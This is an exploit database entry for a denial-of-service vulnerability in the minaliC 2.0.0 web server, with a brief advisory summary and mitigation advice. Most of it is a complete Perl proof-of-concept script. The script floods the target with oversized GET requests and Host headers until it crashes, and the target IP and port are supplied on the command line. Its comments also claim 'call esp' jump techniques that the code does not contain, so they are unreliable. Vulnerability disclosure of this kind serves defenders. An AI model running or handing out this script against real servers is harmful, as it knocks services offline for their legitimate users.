minaliC 2.0.0 - Denial of Service (DoS)

vendor:

minaliC

by:

Fernando Mengali

6.1

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: minaliC

Affected Version From: minaliC 2.0.0

Affected Version To: minaliC 2.0.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional - Service Pack 2 and 3 - English

2024

minaliC 2.0.0 – Denial of Service (DoS)

The exploit targets minaliC 2.0.0 on Windows XP Professional Service Pack 2 and 3 (English). By sending a large amount of data via the GET method to the web server, the server crashes upon receiving and processing the request, leading to denial of service. Successful exploitation of this vulnerability allows remote attackers to disrupt the server, affecting legitimate users.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the software or restrict access to the affected server to trusted entities only.

Source

Exploit-DB raw data:

#!/usr/bin/perl


use Socket;

# Exploit Title: minaliC 2.0.0 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 03 january 2024
# Vendor Homepage: http://minalic.sourceforge.net/
# Notification vendor: No reported
# Tested Version: minaliC 2.0.0
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Vídeo: https://www.youtube.com/watch?v=R_gkEjvpJNw

#1. Description

#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server did not properly handle request with large amounts of data via method GET to web server.
#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){
      $cmd="cls";
    } else {
      $cmd="clear";
    }

    system("$cmd");
    
    intro();
    main();
    
    print "[+] Exploiting... \n";

my $junk = "\x41" x 245;

my $host = "\x41" x 135;
my $i=0;
while ($i <= 3) {
my $buf = "GET /" . $junk . " HTTP/1.1\r\n" . "Host: " . $host . "\r\n\r\n";

my $sock;
socket($sock, AF_INET, SOCK_STREAM, 0) or die "[-] Could not create socket: $!\n";

my $addr = sockaddr_in($port, inet_aton($ip));
connect($sock, $addr);

send($sock, $buf, length($buf), 0);

$i++;

}

    print "[+] Done - Exploited success!!!!!\n\n";
  
   sub intro {
      print "***************************************************\n";
      print "*       minaliC 2.0.0 - Denied of Service         *\n";
      print "*                                                 *\n";
      print "*            Coded by Fernando Mengali            *\n";
      print "*                                                 *\n";
      print "*      e-mail: fernando.mengalli\@gmail.com       *\n";
      print "*                                                 *\n";
      print "***************************************************\n";
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";
        exit(-1);

      }
  }